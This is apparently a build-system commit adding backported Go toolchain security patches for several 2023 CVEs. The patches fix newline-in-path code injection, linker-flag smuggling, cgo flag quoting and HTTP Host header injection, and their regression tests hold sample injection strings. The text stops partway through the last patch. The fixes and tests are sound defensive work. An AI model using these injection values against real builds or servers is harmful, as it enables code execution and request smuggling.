+diff --git a/src/cmd/go/internal/load/pkg.go b/src/cmd/go/internal/load/pkg.go
+index 369a79b..d2b63b0 100644
+--- a/src/cmd/go/internal/load/pkg.go
++++ b/src/cmd/go/internal/load/pkg.go
+@@ -1697,6 +1697,10 @@ func (p *Package) load(stk *ImportStack, bp *build.Package, err error) {
+ 		setError(ImportErrorf(p.ImportPath, "invalid import path %q", p.ImportPath))
+ 		return
+ 	}
++	if strings.ContainsAny(p.Dir, "\r\n") {
++		setError(fmt.Errorf("invalid package directory %q", p.Dir))
++		return
++	}
+ 
+ 	// Build list of imported packages and full dependency list.
+ 	imports := make([]*Package, 0, len(p.Imports))
+diff --git a/src/cmd/go/internal/work/exec.go b/src/cmd/go/internal/work/exec.go
+index 9a9650b..050b785 100644
+--- a/src/cmd/go/internal/work/exec.go
++++ b/src/cmd/go/internal/work/exec.go
+@@ -458,6 +458,12 @@ func (b *Builder) build(a *Action) (err error) {
+ 		b.Print(a.Package.ImportPath + "\n")
+ 	}
+ 
++	if p.Error != nil {
++		// Don't try to build anything for packages with errors. There may be a
++		// problem with the inputs that makes the package unsafe to build.
++		return p.Error
++	}
++
+ 	if a.Package.BinaryOnly {
+ 		p.Stale = true
+ 		p.StaleReason = "binary-only packages are no longer supported"
+diff --git a/src/cmd/go/script_test.go b/src/cmd/go/script_test.go
+index ec498bb..a1398ad 100644
+--- a/src/cmd/go/script_test.go
++++ b/src/cmd/go/script_test.go
+@@ -123,6 +123,7 @@ func (ts *testScript) setup() {
+ 		"devnull=" + os.DevNull,
+ 		"goversion=" + goVersion(ts),
+ 		":=" + string(os.PathListSeparator),
++                "newline=\n",
+ 	}
+ 
+ 	if runtime.GOOS == "plan9" {
+diff --git a/src/cmd/go/testdata/script/build_cwd_newline.txt b/src/cmd/go/testdata/script/build_cwd_newline.txt
+new file mode 100644
+index 0000000..61c6966
+--- /dev/null
++++ b/src/cmd/go/testdata/script/build_cwd_newline.txt
+@@ -0,0 +1,100 @@
++[windows] skip 'filesystem normalizes / to \'
++[plan9] skip 'filesystem disallows \n in paths'
++
++# If the directory path containing a package to be built includes a newline,
++# the go command should refuse to even try to build the package.
++
++env DIR=$WORK${/}${newline}'package main'${newline}'func main() { panic("uh-oh")'${newline}'/*'
++
++mkdir $DIR
++cd $DIR
++exec pwd
++cp $WORK/go.mod ./go.mod
++cp $WORK/main.go ./main.go
++cp $WORK/main_test.go ./main_test.go
++
++! go build -o $devnull .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go build -o $devnull main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go run .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go run main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go test .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go test -v main.go main_test.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++
++# Since we do preserve $PWD (or set it appropriately) for commands, and we do
++# not resolve symlinks unnecessarily, referring to the contents of the unsafe
++# directory via a safe symlink should be ok, and should not inject the data from
++# the symlink target path.
++
++[!symlink] stop 'remainder of test checks symlink behavior'
++[short] stop 'links and runs binaries'
++
++symlink $WORK${/}link -> $DIR
++
++go run $WORK${/}link${/}main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v $WORK${/}link${/}main.go $WORK${/}link${/}main_test.go
++! stdout panic
++! stderr panic
++stdout '^ok$'   # 'go test' combines the test's stdout into stderr
++
++cd $WORK/link
++
++! go run $DIR${/}main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++go run .
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go run main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v
++! stdout panic
++! stderr panic
++stdout '^ok$'  # 'go test' combines the test's stdout into stderr
++
++go test -v .
++! stdout panic
++! stderr panic
++stdout '^ok$'  # 'go test' combines the test's stdout into stderr
++
++
++-- $WORK/go.mod --
++module example
++go 1.19
++-- $WORK/main.go --
++package main
++
++import "C"
++
++func main() {
++	/* nothing here */
++	println("ok")
++}
++-- $WORK/main_test.go --
++package main
++
++import "testing"
++
++func TestMain(*testing.M) {
++	main()
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
new file mode 100644
index 0000000000..61336ee9ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
@@ -0,0 +1,84 @@
+From bf3c8ce03e175e870763901a3850bca01381a828 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Fri, 5 May 2023 13:10:34 -0700
+Subject: [PATCH] [release-branch.go1.19] cmd/go: enforce flags with
+ non-optional arguments
+
+Enforce that linker flags which expect arguments get them, otherwise it
+may be possible to smuggle unexpected flags through as the linker can
+consume what looks like a flag as an argument to a preceding flag (i.e.
+"-Wl,-O -Wl,-R,-bad-flag" is interpreted as "-O=-R -bad-flag"). Also be
+somewhat more restrictive in the general format of some flags.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60305
+Fixes #60511
+Fixes CVE-2023-29404
+
+Change-Id: Icdffef2c0f644da50261cace6f43742783931cff
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1876275
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 896779503cf754cbdac24b61d4cc953b50fe2dde)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902225
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904342
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501217
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Run-TryBot: David Chase <drchase@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf3c8ce03e175e870763901a3850bca01381a828]
+CVE: CVE-2023-29404
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/work/security.go      | 6 +++---
+ src/cmd/go/internal/work/security_test.go | 5 +++++
+ 2 files changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/src/cmd/go/internal/work/security.go b/src/cmd/go/internal/work/security.go
+index a823b20..8acb6dc 100644
+--- a/src/cmd/go/internal/work/security.go
++++ b/src/cmd/go/internal/work/security.go
+@@ -177,17 +177,17 @@ var validLinkerFlags = []*lazyregexp.Regexp{
+ 	re(`-Wl,-Bdynamic`),
+ 	re(`-Wl,-berok`),
+ 	re(`-Wl,-Bstatic`),
+-	re(`-WL,-O([^@,\-][^,]*)?`),
++	re(`-Wl,-O[0-9]+`),
+ 	re(`-Wl,-d[ny]`),
+ 	re(`-Wl,--disable-new-dtags`),
+-	re(`-Wl,-e[=,][a-zA-Z0-9]*`),
++	re(`-Wl,-e[=,][a-zA-Z0-9]+`),
+ 	re(`-Wl,--enable-new-dtags`),
+ 	re(`-Wl,--end-group`),
+ 	re(`-Wl,--(no-)?export-dynamic`),
+ 	re(`-Wl,-framework,[^,@\-][^,]+`),
+ 	re(`-Wl,-headerpad_max_install_names`),
+ 	re(`-Wl,--no-undefined`),
+-	re(`-Wl,-R([^@\-][^,@]*$)`),
++	re(`-Wl,-R,?([^@\-,][^,@]*$)`),
+ 	re(`-Wl,--just-symbols[=,]([^,@\-][^,@]+)`),
+ 	re(`-Wl,-rpath(-link)?[=,]([^,@\-][^,]+)`),
+ 	re(`-Wl,-s`),
+diff --git a/src/cmd/go/internal/work/security_test.go b/src/cmd/go/internal/work/security_test.go
+index bd707ff..7b0b7d3 100644
+--- a/src/cmd/go/internal/work/security_test.go
++++ b/src/cmd/go/internal/work/security_test.go
+@@ -220,6 +220,11 @@ var badLinkerFlags = [][]string{
+ 	{"-Wl,-R,@foo"},
+ 	{"-Wl,--just-symbols,@foo"},
+ 	{"../x.o"},
++	{"-Wl,-R,"},
++	{"-Wl,-O"},
++	{"-Wl,-e="},
++	{"-Wl,-e,"},
++	{"-Wl,-R,-flag"},
+ }
+ 
+ func TestCheckLinkerFlags(t *testing.T) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
new file mode 100644
index 0000000000..70d50cc08a
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
@@ -0,0 +1,112 @@
+From fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 4 May 2023 14:06:39 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/go,cmd/cgo: in _cgo_flags use one
+ line per flag
+
+The flags that we recorded in _cgo_flags did not use any quoting,
+so a flag containing embedded spaces was mishandled.
+Change the _cgo_flags format to put each flag on a separate line.
+That is a simple format that does not require any quoting.
+
+As far as I can tell only cmd/go uses _cgo_flags, and it is only
+used for gccgo. If this patch doesn't cause any trouble, then
+in the next release we can change to only using _cgo_flags for gccgo.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60306
+Fixes #60514
+Fixes CVE-2023-29405
+
+Change-Id: I36b6e188a44c80d7b9573efa577c386770bd2ba3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1875094
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit bcdfcadd5612212089d958bc352a6f6c90742dcc)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902228
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904345
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501220
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+---
+Upstream-Status: Backport [https://github.com/golang/go/commit/fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/cmd/cgo/out.go                            |  4 +++-
+ src/cmd/go/internal/work/gccgo.go             | 14 ++++++-------
+ .../go/testdata/script/gccgo_link_ldflags.txt | 20 +++++++++++++++++++
+ 3 files changed, 29 insertions(+), 9 deletions(-)
+ create mode 100644 src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d26f9e76a374a..d0c6fe3d4c2c2 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -47,7 +47,9 @@ func (p *Package) writeDefs() {
+ 
+ 	fflg := creat(*objDir + "_cgo_flags")
+ 	for k, v := range p.CgoFlags {
+-		fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, strings.Join(v, " "))
++		for _, arg := range v {
++			fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++		}
+ 		if k == "LDFLAGS" && !*gccgo {
+ 			for _, arg := range v {
+ 				fmt.Fprintf(fgo2, "//go:cgo_ldflag %q\n", arg)
+diff --git a/src/cmd/go/internal/work/gccgo.go b/src/cmd/go/internal/work/gccgo.go
+index 08a4c2d8166c7..a048b7f4eecef 100644
+--- a/src/cmd/go/internal/work/gccgo.go
++++ b/src/cmd/go/internal/work/gccgo.go
+@@ -280,14 +280,12 @@ func (tools gccgoToolchain) link(b *Builder, root *Action, out, importcfg string
+ 		const ldflagsPrefix = "_CGO_LDFLAGS="
+ 		for _, line := range strings.Split(string(flags), "\n") {
+ 			if strings.HasPrefix(line, ldflagsPrefix) {
+-				newFlags := strings.Fields(line[len(ldflagsPrefix):])
+-				for _, flag := range newFlags {
+-					// Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
+-					// but they don't mean anything to the linker so filter
+-					// them out.
+-					if flag != "-g" && !strings.HasPrefix(flag, "-O") {
+-						cgoldflags = append(cgoldflags, flag)
+-					}
++				flag := line[len(ldflagsPrefix):]
++				// Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
++				// but they don't mean anything to the linker so filter
++				// them out.
++				if flag != "-g" && !strings.HasPrefix(flag, "-O") {
++					cgoldflags = append(cgoldflags, flag)
+ 				}
+ 			}
+ 		}
+diff --git a/src/cmd/go/testdata/script/gccgo_link_ldflags.txt b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+new file mode 100644
+index 0000000000000..4e91ae56505b6
+--- /dev/null
++++ b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+@@ -0,0 +1,20 @@
++# Test that #cgo LDFLAGS are properly quoted.
++# The #cgo LDFLAGS below should pass a string with spaces to -L,
++# as though searching a directory with a space in its name.
++# It should not pass --nosuchoption to the external linker.
++
++[!cgo] skip
++
++go build
++
++[!exec:gccgo] skip
++
++go build -compiler gccgo
++
++-- go.mod --
++module m
++-- cgo.go --
++package main
++// #cgo LDFLAGS: -L "./ -Wl,--nosuchoption"
++import "C"
++func main() {}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
new file mode 100644
index 0000000000..369eca581e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
@@ -0,0 +1,38 @@
+From 1008486a9ff979dbd21c7466eeb6abf378f9c637 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Tue, 6 Jun 2023 12:51:17 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/cgo: correct _cgo_flags output
+
+For #60306
+For #60514
+
+Change-Id: I3f5d14aee7d7195030e8872e42b1d97aa11d3582
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501298
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+---
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/1008486a9ff979dbd21c7466eeb6abf378f9c637]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+
+ src/cmd/cgo/out.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d0c6fe3d4c2c2..a48f52105628a 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -48,7 +48,7 @@ func (p *Package) writeDefs() {
+ 	fflg := creat(*objDir + "_cgo_flags")
+ 	for k, v := range p.CgoFlags {
+ 		for _, arg := range v {
+-			fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++			fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, arg)
+ 		}
+ 		if k == "LDFLAGS" && !*gccgo {
+ 			for _, arg := range v {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
new file mode 100644
index 0000000000..080def4682
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
@@ -0,0 +1,212 @@
+From 5fa6923b1ea891400153d04ddf1545e23b40041b Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 28 Jun 2023 13:20:08 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: validate Host header before
+ sending
+
+Verify that the Host header we send is valid.
+Avoids surprising behavior such as a Host of "go.dev\r\nX-Evil:oops"
+adding an X-Evil header to HTTP/1 requests.
+
+Add a test, skip the test for HTTP/2. HTTP/2 is not vulnerable to
+header injection in the way HTTP/1 is, but x/net/http2 doesn't validate
+the header and will go into a retry loop when the server rejects it.
+CL 506995 adds the necessary validation to x/net/http2.
+
+Updates #60374
+Fixes #61075
+For CVE-2023-29406
+
+Change-Id: I05cb6866a9bead043101954dfded199258c6dd04
+Reviewed-on: https://go-review.googlesource.com/c/go/+/506996
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit 499458f7ca04087958987a33c2703c3ef03e27e2)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/507358
+Run-TryBot: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5fa6923b1ea891400153d04ddf1545e23b40041b]
+CVE: CVE-2023-29406
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/http_test.go      | 29 ---------------------
+ src/net/http/request.go        | 47 ++++++++--------------------------
+ src/net/http/request_test.go   | 11 ++------
+ src/net/http/transport_test.go | 18 +++++++++++++
+ 4 files changed, 31 insertions(+), 74 deletions(-)
+
+diff --git a/src/net/http/http_test.go b/src/net/http/http_test.go
+index f4ea52d..ea38cb4 100644
+--- a/src/net/http/http_test.go
++++ b/src/net/http/http_test.go
+@@ -49,35 +49,6 @@ func TestForeachHeaderElement(t *testing.T) {
+	}
+ }
+
+-func TestCleanHost(t *testing.T) {
+-	tests := []struct {
+-		in, want string
+-	}{
+-		{"www.google.com", "www.google.com"},
+-		{"www.google.com foo", "www.google.com"},
+-		{"www.google.com/foo", "www.google.com"},
+-		{" first character is a space", ""},
+-		{"[1::6]:8080", "[1::6]:8080"},
+-
+-		// Punycode:
+-		{"гофер.рф/foo", "xn--c1ae0ajs.xn--p1ai"},
+-		{"bücher.de", "xn--bcher-kva.de"},
+-		{"bücher.de:8080", "xn--bcher-kva.de:8080"},
+-		// Verify we convert to lowercase before punycode:
+-		{"BÃœCHER.de", "xn--bcher-kva.de"},
+-		{"BÃœCHER.de:8080", "xn--bcher-kva.de:8080"},
+-		// Verify we normalize to NFC before punycode:
+-		{"gophér.nfc", "xn--gophr-esa.nfc"},            // NFC input; no work needed
+-		{"goph\u0065\u0301r.nfd", "xn--gophr-esa.nfd"}, // NFD input
+-	}
+-	for _, tt := range tests {
+-		got := cleanHost(tt.in)
+-		if tt.want != got {
+-			t.Errorf("cleanHost(%q) = %q, want %q", tt.in, got, tt.want)
+-		}
+-	}
+-}
+-
+ // Test that cmd/go doesn't link in the HTTP server.
+ //
+ // This catches accidental dependencies between the HTTP transport and
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index cb2edd2..2706300 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -18,7 +18,6 @@ import (
+	"io/ioutil"
+	"mime"
+	"mime/multipart"
+-	"net"
+	"net/http/httptrace"
+	"net/textproto"
+	"net/url"
+@@ -26,7 +25,8 @@ import (
+	"strconv"
+	"strings"
+	"sync"
+-
++
++	"golang.org/x/net/http/httpguts"
+	"golang.org/x/net/idna"
+ )
+
+@@ -557,12 +557,19 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+	// is not given, use the host from the request URL.
+	//
+	// Clean the host, in case it arrives with unexpected stuff in it.
+-	host := cleanHost(r.Host)
++	host := r.Host
+	if host == "" {
+		if r.URL == nil {
+			return errMissingHost
+		}
+-		host = cleanHost(r.URL.Host)
++		host = r.URL.Host
++	}
++	host, err = httpguts.PunycodeHostPort(host)
++	if err != nil {
++		return err
++	}
++	if !httpguts.ValidHostHeader(host) {
++		return errors.New("http: invalid Host header")
+	}
+
+	// According to RFC 6874, an HTTP client, proxy, or other
+@@ -717,38 +724,6 @@ func idnaASCII(v string) (string, error) {
+	return idna.Lookup.ToASCII(v)
+ }
+
+-// cleanHost cleans up the host sent in request's Host header.
+-//
+-// It both strips anything after '/' or ' ', and puts the value
+-// into Punycode form, if necessary.
+-//
+-// Ideally we'd clean the Host header according to the spec:
+-//   https://tools.ietf.org/html/rfc7230#section-5.4 (Host = uri-host [ ":" port ]")
+-//   https://tools.ietf.org/html/rfc7230#section-2.7 (uri-host -> rfc3986's host)
+-//   https://tools.ietf.org/html/rfc3986#section-3.2.2 (definition of host)
+-// But practically, what we are trying to avoid is the situation in
+-// issue 11206, where a malformed Host header used in the proxy context
+-// would create a bad request. So it is enough to just truncate at the
+-// first offending character.
+-func cleanHost(in string) string {
+-	if i := strings.IndexAny(in, " /"); i != -1 {
+-		in = in[:i]
+-	}
+-	host, port, err := net.SplitHostPort(in)
+-	if err != nil { // input was just a host
+-		a, err := idnaASCII(in)
+-		if err != nil {
+-			return in // garbage in, garbage out
+-		}
+-		return a
+-	}
+-	a, err := idnaASCII(host)
+-	if err != nil {
+-		return in // garbage in, garbage out
+-	}
+-	return net.JoinHostPort(a, port)
+-}
+-
+ // removeZone removes IPv6 zone identifier from host.
+ // E.g., "[fe80::1%en0]:8080" to "[fe80::1]:8080"
+ func removeZone(host string) string {
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 461d66e..0d417ff 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -676,15 +676,8 @@ func TestRequestBadHost(t *testing.T) {
+	}
+	req.Host = "foo.com with spaces"
+	req.URL.Host = "foo.com with spaces"
+-	req.Write(logWrites{t, &got})
+-	want := []string{
+-		"GET /after HTTP/1.1\r\n",
+-		"Host: foo.com\r\n",
+-		"User-Agent: " + DefaultUserAgent + "\r\n",
+-		"\r\n",
+-	}
+-	if !reflect.DeepEqual(got, want) {
+-		t.Errorf("Writes = %q\n  Want = %q", got, want)
++	if err := req.Write(logWrites{t, &got}); err == nil {
++		t.Errorf("Writing request with invalid Host: succeded, want error")
+	}
+ }
+
+diff --git a/src/net/http/transport_test.go b/src/net/http/transport_test.go
+index fa0c370..0afb6b9 100644
+--- a/src/net/http/transport_test.go
++++ b/src/net/http/transport_test.go
+@@ -6249,3 +6249,21 @@ func TestIssue32441(t *testing.T) {
+		t.Error(err)
+	}
+ }
++
++func TestRequestSanitization(t *testing.T) {
++	setParallel(t)
++	defer afterTest(t)
++
++	ts := newClientServerTest(t, h1Mode, HandlerFunc(func(rw ResponseWriter, req *Request) {
++		if h, ok := req.Header["X-Evil"]; ok {
++			t.Errorf("request has X-Evil header: %q", h)
++		}
++	})).ts
++	defer ts.Close()
++	req, _ := NewRequest("GET", ts.URL, nil)
++	req.Host = "go.dev\r\nX-Evil:evil"
++	resp, _ := ts.Client().Do(req)
++	if resp != nil {
++		resp.Body.Close()
++	}
++}
+--
+2.25.1
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
new file mode 100644
index 0000000000..637f46a537
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
@@ -0,0 +1,114 @@
+From c08a5fa413a34111c9a37fd9e545de27ab0978b1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 19 Jul 2023 10:30:46 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: permit requests with
+ invalid Host headers
+
+Historically, the Transport has silently truncated invalid
+Host headers at the first '/' or ' ' character. CL 506996 changed
+this behavior to reject invalid Host headers entirely.
+Unfortunately, Docker appears to rely on the previous behavior.
+
+When sending a HTTP/1 request with an invalid Host, send an empty
+Host header. This is safer than truncation: If you care about the
+Host, then you should get the one you set; if you don't care,
+then an empty Host should be fine.
+
+Continue to fully validate Host headers sent to a proxy,
+since proxies generally can't productively forward requests
+without a Host.
+
+For #60374
+Fixes #61431
+Fixes #61825
+
+Change-Id: If170c7dd860aa20eb58fe32990fc93af832742b6
+Reviewed-on: https://go-review.googlesource.com/c/go/+/511155
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit b9153f6ef338baee5fe02a867c8fbc83a8b29dd1)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/518855
+Auto-Submit: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c08a5fa413a34111c9a37fd9e545de27ab0978b1]
+CVE: CVE-2023-29406
+Signed-off-by: Ming Liu <liu.ming50@gmail.com>
+---
+ src/net/http/request.go      | 23 ++++++++++++++++++++++-
+ src/net/http/request_test.go | 17 ++++++++++++-----
+ 2 files changed, 34 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index 3100037386..91cb8a66b9 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -582,8 +582,29 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ 	if err != nil {
+ 		return err
+ 	}
++	// Validate that the Host header is a valid header in general,
++	// but don't validate the host itself. This is sufficient to avoid
++	// header or request smuggling via the Host field.
++	// The server can (and will, if it's a net/http server) reject
++	// the request if it doesn't consider the host valid.
+ 	if !httpguts.ValidHostHeader(host) {
+-		return errors.New("http: invalid Host header")
++		// Historically, we would truncate the Host header after '/' or ' '.
++		// Some users have relied on this truncation to convert a network
++		// address such as Unix domain socket path into a valid, ignored
++		// Host header (see https://go.dev/issue/61431).
++		//
++		// We don't preserve the truncation, because sending an altered
++		// header field opens a smuggling vector. Instead, zero out the
++		// Host header entirely if it isn't valid. (An empty Host is valid;
++		// see RFC 9112 Section 3.2.)
++		//
++		// Return an error if we're sending to a proxy, since the proxy
++		// probably can't do anything useful with an empty Host header.
++		if !usingProxy {
++			host = ""
++		} else {
++			return errors.New("http: invalid Host header")
++		}
+ 	}
+ 
+ 	// According to RFC 6874, an HTTP client, proxy, or other
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index fddc85d6a9..dd1e2dc2a1 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -770,16 +770,23 @@ func TestRequestWriteBufferedWriter(t *testing.T) {
+ 	}
+ }
+ 
+-func TestRequestBadHost(t *testing.T) {
++func TestRequestBadHostHeader(t *testing.T) {
+ 	got := []string{}
+ 	req, err := NewRequest("GET", "http://foo/after", nil)
+ 	if err != nil {
+ 		t.Fatal(err)
+ 	}
+-	req.Host = "foo.com with spaces"
+-	req.URL.Host = "foo.com with spaces"
+-	if err := req.Write(logWrites{t, &got}); err == nil {
+-		t.Errorf("Writing request with invalid Host: succeded, want error")
++	req.Host = "foo.com\nnewline"
++	req.URL.Host = "foo.com\nnewline"
++	req.Write(logWrites{t, &got})
++	want := []string{
++		"GET /after HTTP/1.1\r\n",
++		"Host: \r\n",
++		"User-Agent: " + DefaultUserAgent + "\r\n",
++		"\r\n",
++	}
++	if !reflect.DeepEqual(got, want) {
++		t.Errorf("Writes = %q\n  Want = %q", got, want)
+ 	}
+ }
+ 
+-- 
+2.34.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
new file mode 100644
index 0000000000..00685cc180
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
@@ -0,0 +1,175 @@
+From 2300f7ef07718f6be4d8aa8486c7de99836e233f Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 7 Jun 2023 15:27:13 -0700
+Subject: [PATCH] [release-branch.go1.19] crypto/tls: restrict RSA keys in
+ certificates to <= 8192 bits
+
+Extremely large RSA keys in certificate chains can cause a client/server
+to expend significant CPU time verifying signatures. Limit this by
+restricting the size of RSA keys transmitted during handshakes to <=
+8192 bits.
+
+Based on a survey of publicly trusted RSA keys, there are currently only
+three certificates in circulation with keys larger than this, and all
+three appear to be test certificates that are not actively deployed. It
+is possible there are larger keys in use in private PKIs, but we target
+the web PKI, so causing breakage here in the interests of increasing the
+default safety of users of crypto/tls seems reasonable.
+
+Thanks to Mateusz Poliwczak for reporting this issue.
+
+Updates #61460
+Fixes #61579
+Fixes CVE-2023-29409
+
+Change-Id: Ie35038515a649199a36a12fc2c5df3af855dca6c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1912161
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit d865c715d92887361e4bd5596e19e513f27781b7)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1965487
+Reviewed-on: https://go-review.googlesource.com/c/go/+/514915
+Run-TryBot: David Chase <drchase@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Bypass: David Chase <drchase@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2300f7ef07718f6be4d8aa8486c7de99836e233f]
+CVE: CVE-2023-29409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/tls/handshake_client.go      |  8 +++
+ src/crypto/tls/handshake_client_test.go | 78 +++++++++++++++++++++++++
